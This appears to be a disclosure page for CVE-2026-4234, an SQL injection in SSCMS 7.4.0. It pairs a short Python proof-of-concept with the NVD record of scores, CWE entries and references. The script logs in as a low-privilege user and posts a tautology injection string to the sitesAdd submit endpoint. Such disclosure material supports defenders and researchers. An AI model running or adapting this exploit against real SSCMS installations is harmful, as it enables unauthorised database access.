CVE-2026-4234

import requests import sys # CVE-2026-4234 SSCMS SQL Injection PoC # Target: SSCMS 7.4.0 SitesAddController DDL Handler def exploit_sqli(target_url, username, password, injection_payload): """ Exploit SQL injection in SSCMS 7.4.0 target_url: Base URL of SSCMS installation username: Valid low-privilege user password: User password injection_payload: SQL injection payload for tableHandWrite parameter """ login_url = f"{target_url}/api/login" sites_add_url = f"{target_url}/api/sitesAdd/submit" # Step 1: Authenticate session = requests.Session() login_data = { "username": username, "password": password } try: login_response = session.post(login_url, json=login_data, timeout=10) if login_response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Exploit SQL injection exploit_data = { "tableHandWrite": injection_payload, "siteName": "TestSite", "siteDir": "test" } exploit_response = session.post(sites_add_url, json=exploit_data, timeout=10) return exploit_response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None # Example payloads if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-4234.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] # Basic SQL injection test payload payload = "test' OR '1'='1" print(f"[*] Exploiting CVE-2026-4234 on {target}") result = exploit_sqli(target, user, pwd, payload) if result: print(f"[+] Response: {result}")

{"cve": {"id": "CVE-2026-4234", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:17.463", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SSCMS 7.4.0. This vulnerability affects unknown code of the file SitesAddController.Submit.cs of the component DDL Handler. The manipulation of the argument tableHandWrite results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en SSCMS 7.4.0. Esta vulnerabilidad afecta a código desconocido del archivo SitesAddController.Submit.cs del componente DDL Gestor. La manipulación del argumento tableHandWrite resulta en inyección SQL. El ataque puede ser ejecutado remotamente. El exploit ha sido publicado y puede ser utilizado para ataques. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351157", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351157", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771238", "source": "[email protected]"}, {"url": "https://www.yuque.com/la12138/pa2fpb/uzhex80ydgktvzok?singleDoc", "source": "[email protected]"}]}}